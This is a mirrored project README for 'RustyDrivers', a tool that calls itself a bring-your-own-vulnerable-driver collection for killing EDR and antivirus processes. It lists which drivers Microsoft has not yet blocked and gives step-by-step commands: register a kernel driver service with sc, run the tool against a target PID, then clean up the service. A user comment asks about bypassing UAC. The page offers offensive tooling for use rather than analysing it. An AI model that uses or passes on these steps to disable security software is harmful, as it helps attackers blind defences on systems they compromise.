Giter Club home page Giter Club logo

rusty_drivers's Introduction

RustyDrivers

This project is a BYOVD collection with the focus on killing EDR / AV processes.

Currently the following drivers are supported:

Driver Argument Name Blocked
Process Explorer process_explorer Yes
Genshin Impact genshin Yes
Rentdrv2 rentdrv2 No
TrueSight truesight No

Blocked means that the driver is in the block list of Microsoft and cannot be executed on an up to date Windows.

Build

cargo build --release

Usage

rusty_drivers.exe --help            
Usage: rusty_drivers.exe --pid <PID> --driver <DRIVER>

Options:
  -p, --pid <PID>
  -d, --driver <DRIVER>
  -h, --help             Print help
  -V, --version          Print version

Example

Since the executable does not register a service to exploit the driver, this needs to be done manually:

sc create Test123 binpath= c:\test\<DRIVER>.sys type= kernel start= auto

Afterwards the service can be started:

sc start Test123

Finally, to shut down the process with the PID of 1234 using the Process Explorer driver the following command can be used:

rusty_drivers.exe --pid 1234 --driver process_explorer          

Do not forget to cleanup the service afterwards:

sc stop Test123
sc delete Test123

rusty_drivers's People

Contributors

dxxzero avatar

Stargazers

 avatar Wolfgang Neufeld avatar  avatar SandBlasterX avatar lcfr avatar Xm17 avatar  avatar  avatar  avatar Darktortue avatar  avatar  avatar aweNousaku avatar Ronnie Salomonsen avatar  avatar  avatar xrkk avatar Martin Fuchs avatar  avatar

Watchers

 avatar

rusty_drivers's Issues

uac

i just want to know , if the user is limited by admin , can bypass the UAC

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.